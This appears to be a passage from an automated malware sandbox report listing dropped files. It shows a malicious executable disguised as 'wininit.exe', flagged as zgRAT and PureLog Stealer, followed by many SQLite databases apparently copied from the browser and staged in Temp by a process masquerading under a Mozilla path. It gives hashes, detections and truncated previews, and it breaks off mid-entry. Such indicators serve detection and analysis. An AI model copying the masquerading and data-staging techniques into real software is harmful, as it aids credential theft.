                                                                    Preview:EWDYmGBejAPerYYsMuWklW5TE66ZIBfjyDPN1EQn3XJ9Vdyt5IDm5ZFsauTpKmWheqqoIK0HesqNM67kINd983nY7hxGvlcRBmepxJluR5INt1fewsh7IWikCRrkXtW3PZMjbSx8mssDvapGBSUCDfIoD4mgcAWhjP7Uo6Cd5iUaofzmmkiFZTzuQifhqRglVLdfdUbFQ0HeKsAiE931bRHPZMDGaewoCtEdCTJRJdyiMVjii7dqXoJEDNFQQUowDcbboggu0lr8djDEnfidAGQYj9ayN2BzyBet3I4Bbt0v6LkdKBnvwLv7MD1oGrg7k2KbETLelhCRQebYZ6nMPPDmPhh0QP4tM2LEAJZ00IJPJerrldPKDTsUyhLhwUOVmSFXTXXQgxWHGycvzzPxAtp2K0Pd72Df4xm0ZTYOF8oQ7lOAEar7FaV2nMNcH4Snt1MSLmWgbArBFY5ilPYhLGZdctNMF5HLqAgFY6ycDKfEtTxOQo01gvcnbtzcYJaf3gVF2zKpa6dAlVuJ686aEPp4h3ooHWD4u9KM7sWaeLbjScCF8pfaN9ao1bh9LfiE2jQlKhLOlf63yFmF0iqb0mrujgUgKXP8mWrsLb5bdRyrDh0wzbImzHNP2gCoNpDOQ7QbX34ZnO7jy9qBqirtOnJfJb0pZRNyOkbFQYY5hs8kJob2zA7p8U9myvR5

                                                                    C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5964288
                                                                    Entropy (8bit):4.5343894630953825
                                                                    Encrypted:false
                                                                    SSDEEP:49152:zBen3JIJW4ZHgnhjzihnWA+L6w0P3bgKVTiypcl3EQOC:zBrcihnSAEeuYQO
                                                                    MD5:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    SHA1:1FE6C029BDD0CE0E6F7A61250AF6D9EE0E4C42B4
                                                                    SHA-256:6DE635A094F86EAFCE2BDFBB583CBF14986B5059CF20FEC918A86CCC9E6737B0
                                                                    SHA-512:E27F5D229C1919276B5BFE4D010F4BD5D8B4C823FF62FEF89FCF26DC137FF30DD9A4BB8319D503873CBFD893286AB23164C25CC194EBBC54ECC638D2A61C02BA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+.........>.+.. ....,...@.. .......................@,...........@...................................+.K.....,.p.................... ,...................................................... ............... ..H............text...D.+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B................ .+.....H...........<.......t...4...$. .m.+......................................0..........(.... ........8........E....M...).......q...8H...(.... ....~k...{....9....& ....8....(.... ....~k...{....:....& ....8....(.... ....~k...{....:....& ....8z...*...0.......... ........8........E............1...........Z...8........~....(f...~....(j... ....?.... ....8....~....9j... ....~k...{....:....& ....8....~....(^... .... .... ....s....~....(b....... ....~k...{....9I...& ....8>......... ....~

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hyperbrokerhostNetsvc.exe.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1698
                                                                    Entropy (8bit):5.367720686892084
                                                                    Encrypted:false
                                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4x
                                                                    MD5:1CC465BAC3EF7B2D68EBEDF067EF45EA
                                                                    SHA1:2C2DEC3CF0CBCCF3B3238ADEB28524C909BA5273
                                                                    SHA-256:F4604427137BD1C68C5FC6CA6A23DA69977F78ACE88B0C1D3BEBCFA59D64B6F6
                                                                    SHA-512:EE3CB2F0E3696758A3D7E15D9F2B9436EC7307509259AEF502892AE665F59BC50EA75C47200D73BBA4C90A8C07B5736843CDC75CAA4751531D5541AF934CFE51
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                                    C:\Users\user\AppData\Local\Temp\041SLKctM1

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\0FC23f2jli

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\0yEVSuYOMp

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\18YE9ZLTo5

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\19EAhLfTJa

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1A3xZKobjV

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1aUN4QiDAi

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1eeUExkbGe

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1epyzOIGKY

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\1irkYTmEid

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\27MASnDHSg

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2FAI4IclKe

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2e7zlRBEdB

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\3TA2V9iMbH

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4DYNwsP390

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4Uq6KGubg5

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4WPE0GO0BW

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\4YZ7vy45rm

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5BMpcyZUqC

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
